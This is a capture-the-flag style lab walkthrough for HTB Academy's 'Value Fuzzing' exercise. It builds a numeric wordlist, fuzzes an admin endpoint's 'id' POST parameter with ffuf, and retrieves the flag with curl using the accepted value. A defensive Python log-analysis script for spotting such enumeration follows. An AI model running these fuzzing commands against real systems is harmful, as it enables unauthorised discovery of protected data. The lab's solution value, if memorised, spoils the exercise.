Value Fuzzing

Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

Don't forget to edit the /etc/hosts file if needed 😄

As suggested, we'll create a custom ids.txt wordlist containing the numbers 1 to 1000 and use it to fuzz the application:

```bash
# write the numbers 1..1000 to ids.txt, one per line
for i in $(seq 1 1000); do echo $i >> ids.txt; done
```

We'll then fuzz the application with our custom wordlist with the following command:

```bash
# FUZZ marks the position ffuf substitutes each wordlist entry into;
# here it is the value of the 'id' parameter in the POST body
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:37515/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
```

Once the fuzzing run completes, as the image above shows, one id returns a response that differs from all the others: that is the accepted value.

Now, all we have to do is send a curl command to see the content of the page:

```bash
curl http://admin.academy.htb:37515/admin/admin.php -X POST -d 'id=73' -H 'Content-Type: application/x-www-form-urlencoded'
```

And we found our flag!
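From the other side of the wire, a run like the one above leaves an unmistakable footprint: hundreds of POST requests to a single endpoint from one client in a short time, all but one of them returning the same-sized response. The script below is an added example (not part of the original walkthrough or of HTB Academy) showing how a defender can spot that pattern in web server access logs. It parses combined-format log lines, counts requests per (client, method, path) in a sliding time window, and reports the response-size outlier that an enumeration is looking for. The log lines, IP addresses, threshold and window are all constructed assumptions for the demo.

```python
"""Detect parameter-value enumeration (bursts of POSTs to one endpoint) in access logs.

Added example for this walkthrough; the log lines and thresholds below are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" log format: ip - - [ts] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def find_enumeration(lines, threshold=50, window=timedelta(seconds=60)):
    """Flag (ip, method, path) tuples that exceed `threshold` requests inside
    any `window`, and list responses whose size differs from the majority
    (the 'different' answer a fuzzer keys on)."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[(rec["ip"], rec["method"], rec["path"])].append(rec)

    findings = {}
    for key, recs in groups.items():
        recs.sort(key=lambda r: r["ts"])
        # sliding window over the sorted timestamps to find the peak request rate
        start, peak = 0, 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            common_size = Counter(r["size"] for r in recs).most_common(1)[0][0]
            outliers = [r for r in recs if r["size"] != common_size]
            findings[key] = {"peak_per_window": peak, "total": len(recs), "outliers": outliers}
    return findings


def sample_log():
    """Constructed log: one client POSTs to /admin/admin.php once per second for
    120 seconds; only one request gets a different-sized response. A second
    client browses normally."""
    base = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(120):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        size = 1338 if i == 72 else 1024  # the lone outlier: the accepted value
        lines.append(f'10.10.14.5 - - [{ts}] "POST /admin/admin.php HTTP/1.1" 200 {size}')
    for i in range(5):
        ts = (base + timedelta(seconds=10 * i)).strftime(TS_FMT)
        lines.append(f'10.10.14.9 - - [{ts}] "GET /index.php HTTP/1.1" 200 512')
    return lines


if __name__ == "__main__":
    for (ip, method, path), info in find_enumeration(sample_log()).items():
        print(f"{ip} {method} {path}: {info['total']} requests, "
              f"peak {info['peak_per_window']}/window, "
              f"{len(info['outliers'])} size outlier(s)")
```

The threshold and window are the two knobs to tune: legitimate form traffic rarely exceeds a few requests per minute per client to one endpoint, whereas a wordlist run sends hundreds. Reporting the size outlier is what turns an alert into something actionable, since it tells the responder which value was accepted and what to rotate or investigate.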
